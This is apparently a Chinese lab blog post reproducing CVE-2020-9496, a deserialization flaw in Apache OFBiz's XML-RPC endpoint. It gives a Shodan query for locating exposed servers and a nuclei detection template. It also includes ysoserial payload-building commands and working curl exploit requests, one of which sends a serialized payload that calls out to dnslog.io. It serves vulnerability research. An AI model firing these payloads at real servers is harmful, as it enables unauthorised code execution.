0%

CVE-2020-9496反序列化漏洞复现

Posted on 2021-01-26 In 靶机实验 Views:
Symbols count in article: 3.9k Reading time ≈ 4 mins.

影响范围

< 17.12.04版本

资产特征

Set-Cookie : OFBiz.Visitor

shodan搜索相关资产

1	shodan search --fields ip_str,port,org,hostnames OFBiz.Visitor

具体就不贴了。

POC

cve-2020-9496

id: CVE-2020-9496

info:
  name: Apache OFBiz XML-RPC Java Deserialization
  author: dwisiswant0
  severity: medium

  # This temaplte detects a Java deserialization vulnerability in Apache
  # OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for
  # versions prior to 17.12.04.
  # --
  # References:
  # - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz

requests:
  - raw:
      - |
        POST /webtools/control/xmlrpc HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "faultString"
          - "No such service [ProjectDiscovery]"
          - "methodResponse"
        condition: and
        part: body
      - type: word
        words:
          - "Content-Type: text/xml"
        part: header
      - type: status
        status:
          - 200

方法一

1	echo "https://localhost:8443" \| nuclei -t cves/CVE-2020-9496.yaml

方法二

curl https://localhost:8443/webtools/control/xmlrpc -v -X POST -A 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'  -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>' -k -H 'Content-Type: application/xml'

方法三

1	java -jar ysoserial-master-SNAPSHOT.jar CommonsBeanutils1 "touch /tmp/cve-2020-9496" \| base64 \| tr -d "\n"

1	java -jar ysoserial-master-SNAPSHOT.jar URLDNS "http://dnslog.io" \| base64 \| tr -d "\n"

POST /webtools/control/xmlrpc HTTP/1.1
Host: localhost:8443
Content-Type: application/xml
Content-Length: 4093

<?xml version="1.0"?>
<methodCall>
  <methodName>ProjectDiscovery</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64-payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

curl http://localhost:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAEWcxNjFjLmwuZG5zbG9nLmlvdAAAcQB+AAV0AARodHRwcHh0ABhodHRwOi8vZzE2MWMubC5kbnNsb2cuaW94</serializable></value></member></struct></value></param></params></methodCall>' -k  -H 'Content-Type:application/xml'

方法四

msf里面有该反弹shell的exp。

参考链接

Post author: atsud0
Post link: http://atsud0.me/2021/01/26/CVE-2020-9496漏洞复现/
Copyright Notice: All articles in this blog are licensed under BY-NC-SA unless stating additionally.